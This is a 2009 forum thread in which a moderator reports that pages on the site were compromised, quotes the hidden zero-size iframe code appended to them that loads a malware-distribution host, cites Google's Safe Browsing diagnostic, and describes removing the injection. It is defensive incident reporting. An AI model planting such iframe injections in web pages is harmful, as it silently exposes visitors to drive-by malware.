Welcome, Guest. Please login or register.
Forums
« previous next »
Pages: [1]   Go Down

Author Topic: Virus warning!  (Read 1828 times)

Description:

0 Members and 1 Guest are viewing this topic.

Offline Karlos

  • Sockologist
  • Global Moderator
  • Hero Member
  • *****
  • Join Date: Nov 2002
  • Posts: 16867
  • Country: gb
  • Thanked: 4 times
    • Show all replies
Re: Virus warning!
« on: September 05, 2009, 09:22:32 PM »
I've downloaded the page with wget and it has the following HTML appended outside the closing HTML tag

Code: [Select]
<iframe src=http://davtraff.com/lib/index.php&quot; width=0 height=0 style=&quot;hidden&quot; frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=&quot;http://davtraff.com/lib/index.php&quot; width=0 height=0 style=&quot;hidden&quot; frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
From google's safe browsing diagnostic

Quote
What is the current listing status for davtraff.com?

    Site is listed as suspicious - visiting this web site may harm your computer.

What happened when Google visited this site?

    Of the 284 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-09-05, and the last time suspicious content was found on this site was on 2009-09-05.

    Malicious software includes 405 trojan(s), 219 exploit(s), 1 scripting exploit(s).

    This site was hosted on 5 network(s) including AS18106 (VIEWQWEST), AS48974 (MFOREX), AS49314 (NEVAL).

Has this site acted as an intermediary resulting in further distribution of malware?

    Over the past 90 days, davtraff.com appeared to function as an intermediary for the infection of 213 site(s) including pcu.ac.kr/, sisa0582.com/, tryonpalace.org/.

This doesn't look like a false positive to me...
« Last Edit: September 05, 2009, 09:25:33 PM by Karlos »
Logged
int p; // A
 

Offline Karlos

  • Sockologist
  • Global Moderator
  • Hero Member
  • *****
  • Join Date: Nov 2002
  • Posts: 16867
  • Country: gb
  • Thanked: 4 times
    • Show all replies
Re: Virus warning!
« Reply #1 on: September 05, 2009, 09:32:53 PM »
Ok guys. I have confirmed that the iframe HTML was appended to the file somehow and have removed the iframe from the source file.

I've let Wayne know directly. I'll see if I can confirm wether or not any other pages have been touched.
Logged
int p; // A
 

Offline Karlos

  • Sockologist
  • Global Moderator
  • Hero Member
  • *****
  • Join Date: Nov 2002
  • Posts: 16867
  • Country: gb
  • Thanked: 4 times
    • Show all replies
Re: Virus warning!
« Reply #2 on: September 06, 2009, 12:02:56 AM »
Right folks, I've written a script that identifies and removes this infection from any file on the site. Luckily, it was only a few files, most of which were "dummy" index files used to hide directory contents.

The files that were affected were only modified yesterday.

Please check your malware tools again and let me know if you still see anything.
Logged
int p; // A
 
Pages: [1]   Go Up
« previous next »